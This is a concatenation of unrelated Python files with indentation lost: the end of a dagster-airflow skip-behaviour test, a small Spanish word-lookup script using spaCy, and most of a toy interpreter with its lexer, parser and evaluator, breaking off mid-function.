('third_consumer', True),
}
seen = {(ti.task_id, isinstance(value, AirflowSkipException)) for ti, value in result.items()}
assert seen == expected_airflow_task_states
class TestExecuteSkipsPythonOperator(object):
pipeline_name = 'optional_outputs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml')]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_skip_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteSkipsContainerized(object):
pipeline_name = 'optional_outputs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml')]
run_id = str(uuid.uuid4())
op_kwargs = {'host_tmp_dir': '/tmp'}
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_skip_pipeline_execution(dagster_airflow_docker_operator_pipeline)
|
from .elf import Corpus
from .base import CorpusBase, JsonCorpus, JsonCorpusLoader
|
import json
import re
import spacy
import enchant
import copy as cp
sp = spacy.load('en_core_web_sm')
def lemmatize_this(str_word):
return sp(str_word)[0]
def main():
while True:
print("Ingrese la Palabra: ")
word = input()
word = str(lemmatize_this(word))
try:
with open("../Datos/06_words_fixed/stg0/" + word + ".json", "r") as answerJson:
wordDic = json.load(answerJson)
elems = [[k, v] for k, v in wordDic.items()]
elems.sort(key = lambda x: x[1])
rank = len(elems)
for i in elems:
print(rank, i)
rank -=1
except:
print("Palabra no encontrada")
if __name__ == "__main__":
main()
|
#######################################
# IMPORTS
#######################################
from strings_with_arrows import *
import string
#######################################
# CONSTANTS
#######################################
DIGITS = '0123456789'
LETTERS = string.ascii_letters
LETTERS_DIGITS = LETTERS + DIGITS
#######################################
# ERRORS
#######################################
class Error:
def __init__(self, pos_start, pos_end, error_name, details):
self.pos_start = pos_start
self.pos_end = pos_end
self.error_name = error_name
self.details = details
def as_string(self):
result = f'{self.error_name}: {self.details}\n'
result += f'File {self.pos_start.fn}, line {self.pos_start.ln + 1}'
result += '\n\n' + string_with_arrows(self.pos_start.ftxt, self.pos_start, self.pos_end)
return result
class IllegalCharError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__(pos_start, pos_end, 'Illegal Character', details)
class ExpectedCharError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__(pos_start, pos_end, 'Expected Character', details)
class InvalidSyntaxError(Error):
def __init__(self, pos_start, pos_end, details=''):
super().__init__(pos_start, pos_end, 'Invalid Syntax', details)
class RTError(Error):
def __init__(self, pos_start, pos_end, details, context):
super().__init__(pos_start, pos_end, 'Runtime Error', details)
self.context = context
def as_string(self):
result = self.generate_traceback()
result += f'{self.error_name}: {self.details}'
result += '\n\n' + string_with_arrows(self.pos_start.ftxt, self.pos_start, self.pos_end)
return result
def generate_traceback(self):
result = ''
pos = self.pos_start
ctx = self.context
while ctx:
result = f' File {pos.fn}, line {str(pos.ln + 1)}, in {ctx.display_name}\n' + result
pos = ctx.parent_entry_pos
ctx = ctx.parent
return 'Traceback (most recent call last):\n' + result
#######################################
# POSITION
#######################################
class Position:
def __init__(self, idx, ln, col, fn, ftxt):
self.idx = idx
self.ln = ln
self.col = col
self.fn = fn
self.ftxt = ftxt
def advance(self, current_char=None):
self.idx += 1
self.col += 1
if current_char == '\n':
self.ln += 1
self.col = 0
return self
def copy(self):
return Position(self.idx, self.ln, self.col, self.fn, self.ftxt)
#######################################
# TOKENS
#######################################
TT_INT = 'INT'
TT_FLOAT = 'FLOAT'
TT_IDENTIFIER = 'IDENTIFIER'
TT_KEYWORD = 'KEYWORD'
TT_PLUS = 'PLUS'
TT_MINUS = 'MINUS'
TT_MUL = 'MUL'
TT_DIV = 'DIV'
TT_POW = 'POW'
TT_EQ = 'EQ'
TT_LPAREN = 'LPAREN'
TT_RPAREN = 'RPAREN'
TT_EE = 'EE'
TT_NE = 'NE'
TT_LT = 'LT'
TT_GT = 'GT'
TT_LTE = 'LTE'
TT_GTE = 'GTE'
TT_COMMA = 'COMMA'
TT_ARROW = 'ARROW'
TT_EOF = 'EOF'
KEYWORDS = [
'VAR',
'AND',
'OR',
'NOT',
'IF',
'ELIF',
'ELSE',
'FOR',
'TO',
'STEP',
'WHILE',
'FUN',
'THEN'
]
class Token:
def __init__(self, type_, value=None, pos_start=None, pos_end=None):
self.type = type_
self.value = value
if pos_start:
self.pos_start = pos_start.copy()
self.pos_end = pos_start.copy()
self.pos_end.advance()
if pos_end:
self.pos_end = pos_end.copy()
def matches(self, type_, value):
return self.type == type_ and self.value == value
def __repr__(self):
if self.value: return f'{self.type}:{self.value}'
return f'{self.type}'
#######################################
# LEXER
#######################################
class Lexer:
def __init__(self, fn, text):
self.fn = fn
self.text = text
self.pos = Position(-1, 0, -1, fn, text)
self.current_char = None
self.advance()
def advance(self):
self.pos.advance(self.current_char)
self.current_char = self.text[self.pos.idx] if self.pos.idx < len(self.text) else None
def make_tokens(self):
tokens = []
while self.current_char != None:
if self.current_char in ' \t':
self.advance()
elif self.current_char in DIGITS:
tokens.append(self.make_number())
elif self.current_char in LETTERS:
tokens.append(self.make_identifier())
elif self.current_char == '+':
tokens.append(Token(TT_PLUS, pos_start=self.pos))
self.advance()
elif self.current_char == '-':
tokens.append(self.make_minus_or_arrow())
elif self.current_char == '*':
tokens.append(Token(TT_MUL, pos_start=self.pos))
self.advance()
elif self.current_char == '/':
tokens.append(Token(TT_DIV, pos_start=self.pos))
self.advance()
elif self.current_char == '^':
tokens.append(Token(TT_POW, pos_start=self.pos))
self.advance()
elif self.current_char == '(':
tokens.append(Token(TT_LPAREN, pos_start=self.pos))
self.advance()
elif self.current_char == ')':
tokens.append(Token(TT_RPAREN, pos_start=self.pos))
self.advance()
elif self.current_char == '!':
token, error = self.make_not_equals()
if error: return [], error
tokens.append(token)
elif self.current_char == '=':
tokens.append(self.make_equals())
elif self.current_char == '<':
tokens.append(self.make_less_than())
elif self.current_char == '>':
tokens.append(self.make_greater_than())
elif self.current_char == ',':
tokens.append(Token(TT_COMMA, pos_start=self.pos))
self.advance()
else:
pos_start = self.pos.copy()
char = self.current_char
self.advance()
return [], IllegalCharError(pos_start, self.pos, "'" + char + "'")
tokens.append(Token(TT_EOF, pos_start=self.pos))
return tokens, None
def make_number(self):
num_str = ''
dot_count = 0
pos_start = self.pos.copy()
while self.current_char != None and self.current_char in DIGITS + '.':
if self.current_char == '.':
if dot_count == 1: break
dot_count += 1
num_str += self.current_char
self.advance()
if dot_count == 0:
return Token(TT_INT, int(num_str), pos_start, self.pos)
else:
return Token(TT_FLOAT, float(num_str), pos_start, self.pos)
def make_identifier(self):
id_str = ''
pos_start = self.pos.copy()
while self.current_char != None and self.current_char in LETTERS_DIGITS + '_':
id_str += self.current_char
self.advance()
tok_type = TT_KEYWORD if id_str in KEYWORDS else TT_IDENTIFIER
return Token(tok_type, id_str, pos_start, self.pos)
def make_minus_or_arrow(self):
tok_type = TT_MINUS
pos_start = self.pos.copy()
self.advance()
if self.current_char == '>':
self.advance()
tok_type = TT_ARROW
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
def make_not_equals(self):
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
return Token(TT_NE, pos_start=pos_start, pos_end=self.pos), None
self.advance()
return None, ExpectedCharError(pos_start, self.pos, "'=' (after '!')")
def make_equals(self):
tok_type = TT_EQ
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
tok_type = TT_EE
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
def make_less_than(self):
tok_type = TT_LT
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
tok_type = TT_LTE
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
def make_greater_than(self):
tok_type = TT_GT
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
tok_type = TT_GTE
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
#######################################
# NODES
#######################################
class NumberNode:
def __init__(self, tok):
self.tok = tok
self.pos_start = self.tok.pos_start
self.pos_end = self.tok.pos_end
def __repr__(self):
return f'{self.tok}'
class VarAccessNode:
def __init__(self, var_name_tok):
self.var_name_tok = var_name_tok
self.pos_start = self.var_name_tok.pos_start
self.pos_end = self.var_name_tok.pos_end
class VarAssignNode:
def __init__(self, var_name_tok, value_node):
self.var_name_tok = var_name_tok
self.value_node = value_node
self.pos_start = self.var_name_tok.pos_start
self.pos_end = self.value_node.pos_end
class BinOpNode:
def __init__(self, left_node, op_tok, right_node):
self.left_node = left_node
self.op_tok = op_tok
self.right_node = right_node
self.pos_start = self.left_node.pos_start
self.pos_end = self.right_node.pos_end
def __repr__(self):
return f'({self.left_node}, {self.op_tok}, {self.right_node})'
class UnaryOpNode:
def __init__(self, op_tok, node):
self.op_tok = op_tok
self.node = node
self.pos_start = self.op_tok.pos_start
self.pos_end = node.pos_end
def __repr__(self):
return f'({self.op_tok}, {self.node})'
class IfNode:
def __init__(self, cases, else_case):
self.cases = cases
self.else_case = else_case
self.pos_start = self.cases[0][0].pos_start
self.pos_end = (self.else_case or self.cases[len(self.cases) - 1][0]).pos_end
class ForNode:
def __init__(self, var_name_tok, start_value_node, end_value_node, step_value_node, body_node):
self.var_name_tok = var_name_tok
self.start_value_node = start_value_node
self.end_value_node = end_value_node
self.step_value_node = step_value_node
self.body_node = body_node
self.pos_start = self.var_name_tok.pos_start
self.pos_end = self.body_node.pos_end
class WhileNode:
def __init__(self, condition_node, body_node):
self.condition_node = condition_node
self.body_node = body_node
self.pos_start = self.condition_node.pos_start
self.pos_end = self.body_node.pos_end
class FuncDefNode:
def __init__(self, var_name_tok, arg_name_toks, body_node):
self.var_name_tok = var_name_tok
self.arg_name_toks = arg_name_toks
self.body_node = body_node
if self.var_name_tok:
self.pos_start = self.var_name_tok.pos_start
elif len(self.arg_name_toks) > 0:
self.pos_start = self.arg_name_toks[0].pos_start
else:
self.pos_start = self.body_node.pos_start
self.pos_end = self.body_node.pos_end
class CallNode:
def __init__(self, node_to_call, arg_nodes):
self.node_to_call = node_to_call
self.arg_nodes = arg_nodes
self.pos_start = self.node_to_call.pos_start
if len(self.arg_nodes) > 0:
self.pos_end = self.arg_nodes[len(self.arg_nodes) - 1].pos_end
else:
self.pos_end = self.node_to_call.pos_end
#######################################
# PARSE RESULT
#######################################
class ParseResult:
def __init__(self):
self.error = None
self.node = None
self.last_registered_advance_count = 0
self.advance_count = 0
def register_advancement(self):
self.last_registered_advance_count = 1
self.advance_count += 1
def register(self, res):
self.last_registered_advance_count = res.advance_count
self.advance_count += res.advance_count
if res.error: self.error = res.error
return res.node
def success(self, node):
self.node = node
return self
def failure(self, error):
if not self.error or self.last_registered_advance_count == 0:
self.error = error
return self
#######################################
# PARSER
#######################################
class Parser:
def __init__(self, tokens):
self.tokens = tokens
self.tok_idx = -1
self.advance()
def advance(self, ):
self.tok_idx += 1
if self.tok_idx < len(self.tokens):
self.current_tok = self.tokens[self.tok_idx]
return self.current_tok
def parse(self):
res = self.expr()
if not res.error and self.current_tok.type != TT_EOF:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected '+', '-', '*', '/', '^', '==', '!=', '<', '>', <=', '>=', 'AND' or 'OR'"
))
return res
###################################
def expr(self):
res = ParseResult()
if self.current_tok.matches(TT_KEYWORD, 'VAR'):
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected identifier"
))
var_name = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_EQ:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected '='"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
return res.success(VarAssignNode(var_name, expr))
node = res.register(self.bin_op(self.comp_expr, ((TT_KEYWORD, 'AND'), (TT_KEYWORD, 'OR'))))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected 'VAR', 'IF', 'FOR', 'WHILE', 'FUN', int, float, identifier, '+', '-', '(' or 'NOT'"
))
return res.success(node)
def comp_expr(self):
res = ParseResult()
if self.current_tok.matches(TT_KEYWORD, 'NOT'):
op_tok = self.current_tok
res.register_advancement()
self.advance()
node = res.register(self.comp_expr())
if res.error: return res
return res.success(UnaryOpNode(op_tok, node))
node = res.register(self.bin_op(self.arith_expr, (TT_EE, TT_NE, TT_LT, TT_GT, TT_LTE, TT_GTE)))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected int, float, identifier, '+', '-', '(' or 'NOT'"
))
return res.success(node)
def arith_expr(self):
return self.bin_op(self.term, (TT_PLUS, TT_MINUS))
def term(self):
return self.bin_op(self.factor, (TT_MUL, TT_DIV))
def factor(self):
res = ParseResult()
tok = self.current_tok
if tok.type in (TT_PLUS, TT_MINUS):
res.register_advancement()
self.advance()
factor = res.register(self.factor())
if res.error: return res
return res.success(UnaryOpNode(tok, factor))
return self.power()
def power(self):
return self.bin_op(self.call, (TT_POW, ), self.factor)
def call(self):
res = ParseResult()
atom = res.register(self.atom())
if res.error: return res
if self.current_tok.type == TT_LPAREN:
res.register_advancement()
self.advance()
arg_nodes = []
if self.current_tok.type == TT_RPAREN:
res.register_advancement()
self.advance()
else:
arg_nodes.append(res.register(self.expr()))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected ')', 'VAR', 'IF', 'FOR', 'WHILE', 'FUN', int, float, identifier, '+', '-', '(' or 'NOT'"
))
while self.current_tok.type == TT_COMMA:
res.register_advancement()
self.advance()
arg_nodes.append(res.register(self.expr()))
if res.error: return res
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected ',' or ')'"
))
res.register_advancement()
self.advance()
return res.success(CallNode(atom, arg_nodes))
return res.success(atom)
def atom(self):
res = ParseResult()
tok = self.current_tok
if tok.type in (TT_INT, TT_FLOAT):
res.register_advancement()
self.advance()
return res.success(NumberNode(tok))
elif tok.type == TT_IDENTIFIER:
res.register_advancement()
self.advance()
return res.success(VarAccessNode(tok))
elif tok.type == TT_LPAREN:
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
if self.current_tok.type == TT_RPAREN:
res.register_advancement()
self.advance()
return res.success(expr)
else:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected ')'"
))
elif tok.matches(TT_KEYWORD, 'IF'):
if_expr = res.register(self.if_expr())
if res.error: return res
return res.success(if_expr)
elif tok.matches(TT_KEYWORD, 'FOR'):
for_expr = res.register(self.for_expr())
if res.error: return res
return res.success(for_expr)
elif tok.matches(TT_KEYWORD, 'WHILE'):
while_expr = res.register(self.while_expr())
if res.error: return res
return res.success(while_expr)
elif tok.matches(TT_KEYWORD, 'FUN'):
func_def = res.register(self.func_def())
if res.error: return res
return res.success(func_def)
return res.failure(InvalidSyntaxError(
tok.pos_start, tok.pos_end,
"Expected int, float, identifier, '+', '-', '(', 'IF', 'FOR', 'WHILE', 'FUN'"
))
def if_expr(self):
res = ParseResult()
cases = []
else_case = None
if not self.current_tok.matches(TT_KEYWORD, 'IF'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'IF'"
))
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
cases.append((condition, expr))
while self.current_tok.matches(TT_KEYWORD, 'ELIF'):
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
cases.append((condition, expr))
if self.current_tok.matches(TT_KEYWORD, 'ELSE'):
res.register_advancement()
self.advance()
else_case = res.register(self.expr())
if res.error: return res
return res.success(IfNode(cases, else_case))
def for_expr(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'FOR'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'FOR'"
))
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier"
))
var_name = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_EQ:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '='"
))
res.register_advancement()
self.advance()
start_value = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'TO'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'TO'"
))
res.register_advancement()
self.advance()
end_value = res.register(self.expr())
if res.error: return res
if self.current_tok.matches(TT_KEYWORD, 'STEP'):
res.register_advancement()
self.advance()
step_value = res.register(self.expr())
if res.error: return res
else:
step_value = None
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
body = res.register(self.expr())
if res.error: return res
return res.success(ForNode(var_name, start_value, end_value, step_value, body))
def while_expr(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'WHILE'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'WHILE'"
))
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
body = res.register(self.expr())
if res.error: return res
return res.success(WhileNode(condition, body))
def func_def(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'FUN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'FUN'"
))
res.register_advancement()
self.advance()
if self.current_tok.type == TT_IDENTIFIER:
var_name_tok = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_LPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '('"
))
else:
var_name_tok = None
if self.current_tok.type != TT_LPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier or '('"
))
res.register_advancement()
self.advance()
arg_name_toks = []
if self.current_tok.type == TT_IDENTIFIER:
arg_name_toks.append(self.current_tok)
res.register_advancement()
self.advance()
while self.current_tok.type == TT_COMMA:
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier"
))
arg_name_toks.append(self.current_tok)
res.register_advancement()
self.advance()
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected ',' or ')'"
))
else:
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier or ')'"
))
res.register_advancement()
self.advance()
if self.current_tok.type != TT_ARROW:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '->'"
))
res.register_advancement()
self.advance()
node_to_return = res.register(self.expr())
if res.error: return res
return res.success(FuncDefNode(
var_name_tok,
arg_name_toks,
node_to_return
))
###################################
def bin_op(self, func_a, ops, func_b=None):
if func_b == None:
func_b = func_a
res = ParseResult()
left = res.register(func_a())
if res.error: return res
while self.current_tok.type in ops or (self.current_tok.type, self.current_tok.value) in ops:
op_tok = self.current_tok
res.register_advancement()
self.advance()
right = res.register(func_b())
if res.error: return res
left = BinOpNode(left, op_tok, right)
return res.success(left)
#######################################
# RUNTIME RESULT
#######################################
class RTResult:
def __init__(self):
self.value = None
self.error = None
def register(self, res):
self.error = res.error
return res.value
def success(self, value):
self.value = value
return self
def failure(self, error):
self.error = error
return self
#######################################
# VALUES
#######################################
class Value:
def __init__(self):
self.set_pos()
self.set_context()
def set_pos(self, pos_start=None, pos_end=None):
self.pos_start = pos_start
self.pos_end = pos_end
return self
def set_context(self, context=None):
self.context = context
return self
def added_to(self, other):
return None, self.illegal_operation(other)
def subbed_by(self, other):
return None, self.illegal_operation(other)
def multed_by(self, other):
return None, self.illegal_operation(other)
def dived_by(self, other):
return None, self.illegal_operation(other)
def powed_by(self, other):
return None, self.illegal_operation(other)
def get_comparison_eq(self, other):
return None, self.illegal_operation(other)
def get_comparison_ne(self, other):
return None, self.illegal_operation(other)
def get_comparison_lt(self, other):
return None, self.illegal_operation(other)
def get_comparison_gt(self, other):
return None, self.illegal_operation(other)
def get_comparison_lte(self, other):
return None, self.illegal_operation(other)
def get_comparison_gte(self, other):
return None, self.illegal_operation(other)
def anded_by(self, other):
return None, self.illegal_operation(other)
def ored_by(self, other):
return None, self.illegal_operation(other)
def notted(self):
return None, self.illegal_operation(other)
def execute(self, args):
return RTResult().failure(self.illegal_operation())
def copy(self):
raise Exception('No copy method defined')
def is_true(self):
return False
def illegal_operation(self, other=None):
if not other: other = self
return RTError(
self.pos_start, other.pos_end,
'Illegal operation',
self.context
)
class Number(Value):
def __init__(self, value):
super().__init__()
self.value = value
def added_to(self, other):
if isinstance(other, Number):
return Number(self.value + other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def subbed_by(self, other):
if isinstance(other, Number):
return Number(self.value - other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def multed_by(self, other):
if isinstance(other, Number):
return Number(self.value * other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def dived_by(self, other):
if isinstance(other, Number):
if other.value == 0:
return None, RTError(
other.pos_start, other.pos_end,
'Division by zero',
self.context
)
return Number(self.value / other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def powed_by(self, other):
if isinstance(other, Number):
return Number(self.value ** other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_eq(self, other):
if isinstance(other, Number):
return Number(int(self.value == other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_ne(self, other):
if isinstance(other, Number):
return Number(int(self.value != other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lt(self, other):
if isinstance(other, Number):
return Number(int(self.value < other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gt(self, other):
if isinstance(other, Number):
return Number(int(self.value > other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lte(self, other):
if isinstance(other, Number):
return Number(int(self.value <= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gte(self, other):
if isinstance(other, Number):
return Number(int(self.value >= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def anded_by(self, other):
if isinstance(other, Number):
return Number(int(self.value and other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def ored_by(self, other):
if isinstance(other, Number):
return Number(int(self.value or other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def notted(self):
return Number(1 if self.value == 0 else 0).set_context(self.context), None
def copy(self):
copy = Number(self.value)
copy.set_pos(self.pos_start, self.pos_end)
copy.set_context(self.context)
return copy
def is_true(self):
return self.value != 0
def __repr__(self):
return str(self.value)
class Function(Value):
def __init__(self, name, body_node, arg_names):
super().__init__()
self.name = name or "<anonymous>"
self.body_node = body_node
self.arg_names = arg_names
def execute(self, args):
res = RTResult()
interpreter = Interpreter()
new_context = Context(self.name, self.context, self.pos_start)
new_context.symbol_table = SymbolTable(new_context.parent.symbol_table)
if len(args) > len(self.arg_names):
return res.failure(RTError(
self.pos_start, self.pos_end,
f"{len(args) - len(self.arg_names)} too many args passed into '{self.name}'",
self.context
))
if len(args) < len(self.arg_names):
return res.failure(RTError(
self.pos_start, self.pos_end,
f"{len(self.arg_names) - len(args)} too few args passed into '{self.name}'",
self.context
))
for i in range(len(args)):
arg_name = self.arg_names[i]
arg_value = args[i]
arg_value.set_context(new_context)
new_context.symbol_table.set(arg_name, arg_value)
value = res.register(interpreter.visit(self.body_node, new_context))
if res.error: return res
return res.success(value)
def copy(self):
copy = Function(self.name, self.body_node, self.arg_names)
copy.set_context(self.context)
copy.set_pos(self.pos_start, self.pos_end)
return copy
def __repr__(self):
return f"<function {self.name}>"
#######################################
# CONTEXT
#######################################
class Context:
def __init__(self, display_name, parent=None, parent_entry_pos=None):
self.display_name = display_name
self.parent = parent
self.parent_entry_pos = parent_entry_pos
self.symbol_table = None
#######################################
# SYMBOL TABLE
#######################################
class SymbolTable:
def __init__(self, parent=None):
self.symbols = {}
self.parent = parent
def get(self, name):
value = self.symbols.get(name, None)
if value == None and self.parent:
return self.parent.get(name)
return value
def set(self, name, value):
self.symbols[name] = value
def remove(self, name):
del self.symbols[name]
#######################################
# INTERPRETER
#######################################
class Interpreter:
def visit(self, node, context):
method_name = f'visit_{type(node).__name__}'
method = getattr(self, method_name, self.no_visit_method)
return method(node, context)
def no_visit_method(self, node, context):
raise Exception(f'No visit_{type(node).__name__} method defined')
###################################
def visit_NumberNode(self, node, context):
return RTResult().success(
Number(node.tok.value).set_context(context).set_pos(node.pos_start, node.pos_end)
)
def visit_VarAccessNode(self, node, context):
res = RTResult()
var_name = node.var_name_tok.value
value = context.symbol_table.get(var_name)
if not value:
return res.failure(RTError(
node.pos_start, node.pos_end,
f"'{var_name}' is not defined",
context
))
value = value.copy().set_pos(node.pos_start, node.pos_end)
return res.success(value)
def visit_VarAssignNode(self, node, context):
res = RTResult()
var_name = node.var_name_tok.value
value = res.register(self.visit(node.value_node, context))
if res.error: return res
context.symbol_table.set(var_name, value)
return res.success(value)
def visit_BinOpNode(self, node, context):
res = RTResult()
left = res.register(self.visit(node.left_node, context))
if res.error: return res
right = res.register(self.visit(node.right_node, context))
if res.error: return res
if node.op_tok.type == TT_PLUS:
result, error = left.added_to(right)
elif node.op_tok.type == TT_MINUS:
result, error = left.subbed_by(right)
elif node.op_tok.type == TT_MUL:
result, error = left.multed_by(right)
elif node.op_tok.type == TT_DIV:
result, error = left.dived_by(right)
elif node.op_tok.type == TT_POW:
result, error = left.powed_by(right)
elif node.op_tok.type == TT_EE:
result, error = left.get_comparison_eq(right)
elif node.op_tok.type == TT_NE:
result, error = left.get_comparison_ne(right)
elif node.op_tok.type == TT_LT:
result, error = left.get_comparison_lt(right)
elif node.op_tok.type == TT_GT:
result, error = left.get_comparison_gt(right)
elif node.op_tok.type == TT_LTE:
result, error = left.get_comparison_lte(right)
elif node.op_tok.type == TT_GTE:
result, error = left.get_comparison_gte(right)
elif node.op_tok.matches(TT_KEYWORD, 'AND'):
result, error = left.anded_by(right)
elif node.op_tok.matches(TT_KEYWORD, 'OR'):
result, error = left.ored_by(right)
if error:
return res.failure(error)
else:
return res.success(result.set_pos(node.pos_start, node.pos_end))
def visit_UnaryOpNode(self, node, context):
res = RTResult()
number = res.register(self.visit(node.node, context))
if res.error: return res
error = None
if node.op_tok.type == TT_MINUS:
number, error = number.multed_by(Number(-1))
elif node.op_tok.matches(TT_KEYWORD, 'NOT'):
number, error = number.notted()
if error:
return res.failure(error)
else:
return res.success(number.set_pos(node.pos_start, node.pos_end))
def visit_IfNode(self, node, context):
res = RTResult()
for condition, expr in node.cases:
condition_value = res.register(self.visit(condition, context))
if res.error: return res
if condition_value.is_true():
expr_value = res.register(self.visit(expr, context))
if res.error: return res
return res.success(expr_value)
if node.else_case:
else_value = res.register(self.visit(node.else_case, context))
if res.error: return res
return res.success(else_value)
return res.success(None)
def visit_ForNode(self, node, context):
res = RTResult()
start_value = res.register(self.visit(node.start_value_node, context))
if res.error: return res
end_value = res.register(self.visit(node.end_value_node, context))
if res.error: return res
if node.step_value_node:
step_value = res.register(self.visit(node.step_value_node, context))
if res.error: return res
else:
step_value = Number(1)
i = start_value.value
if step_value.value >= 0:
condition = lambda: i < end_value.value
else:
condition = lambda: i > end_value.value
while condition():
context.symbol_table.set(node.var_name_tok.value, Number(i))
i += step_value.value
res.register(self.visit(node.body_node, context))
if res.error: return res
return res.success(None)
def visit_WhileNode(self, node, context):
res = RTResult()
while True:
condition = res.register(self.visit(node.condition_node, context))
if res.error: return res
if not condition.is_true(): break
res.register(self.visit(node.body_node, context))
if res.error: return res
return res.success(None)
def visit_FuncDefNode(self, node, context):
res = RTResult()
func_name = node.var_name_tok.value if node.var_name_tok else None
body_node = node.body_node
arg_names = [arg_name.value for arg_name in node.arg_name_toks]
func_value = Function(func_name, body_node, arg_names).set_context(context).set_pos(node.pos_start, node.pos_end)
if node.var_name_tok:
context.symbol_table.set(func_name, func_value)
return res.success(func_value)
def visit_CallNode(self, node, context):
res = RTResult()
args = []
value_to_call = res.register(self.visit(node.node_to_call, context))
